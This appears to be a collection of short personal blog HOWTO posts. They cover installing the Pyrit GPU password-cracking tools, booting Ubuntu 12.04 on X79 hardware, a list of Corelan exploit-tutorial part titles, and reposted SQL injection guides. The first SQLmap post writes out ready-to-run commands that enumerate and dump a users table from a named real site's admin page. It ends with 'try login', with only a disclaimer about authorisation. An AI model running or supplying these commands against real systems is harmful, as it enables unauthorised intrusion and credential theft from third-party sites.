Download pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).

tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
python setup.py install

tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
python setup.py install

To test if the installation is correct or not.

pyrit list_cores
pyrit benchmark
pyrit benchmark_long

That's all! See you.

Before water cooling



After water cooling

HOWTO : Ubuntu 12.04 LTS on Intel X79 Express Chipset and nVidia Display Card

At this writing, Ubuntu 12.04 LTS is still under heavy development and at Alpha 1 stage.

It is no problem to boot Ubuntu 12.04 LTS on Intel X79 Express Chipset due to Kernel version 3.2.

If the system is equipped with nVidia display card, you need to set "nomodeset" by pressing F6 on the boot up menu of the Live CD of Ubuntu 12.04 LTS. (Press Enter when "keyboard" and "human" figures appear on the bottom on the screen when booting up)

That's all! See you.

Exploit writing tutorial

The is the summary of the Corelan's Exploit writing tutorial offical site.

Part 1 : Stack Based Overflows

Part 2 : Stack Based Overflows - jumping to shellcode

Part 3 : SEH Based Exploits

Part 3b : SEH Based Exploits - just another example

Part 4 : From Exploit to Metasploit - The basic

Part 5 : How debugger modules & plugins can speed up basic exploit development

Part 6 : Bypassing Stack Cookies, SafeSeh, SEHOP, HW DEP and ASLR

Part 7 : Unicode - from 0x00410041 to calc

Part 8 : Win32 Egg Hunting

Part 9 : Introduction to Win32 shellcoding

Part 10 : Chaining DEP with ROP - the Rubik's Cube

Part 11 : Heap Spraying Demystified

That's all! See you.

HOWTO : SQL Injection with SQLmap on Back|Track 5 R1

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to :ruo911

This is ruo911's work but not mine. I re-post it for educational purpose only.



Command

cd /pentest/web/scanners/sqlmap
python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 --dbs
python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 -D pjirc_forum --tables
python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 -T users --columns
python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 -T users -U test --dump

try login.

p.s
1. Backtrack 5 R1 - sqlmap
cd /pentest/database/sqlmap

2. user agent options
example)
--user-agent="Mozilla/5.0 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1"

That's all! See you.

HOWTO : SQL Injection by tools

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : medmado1990

This is medmado1990's work but not mine. I re-post it for educational purpose only.





That's all! See you.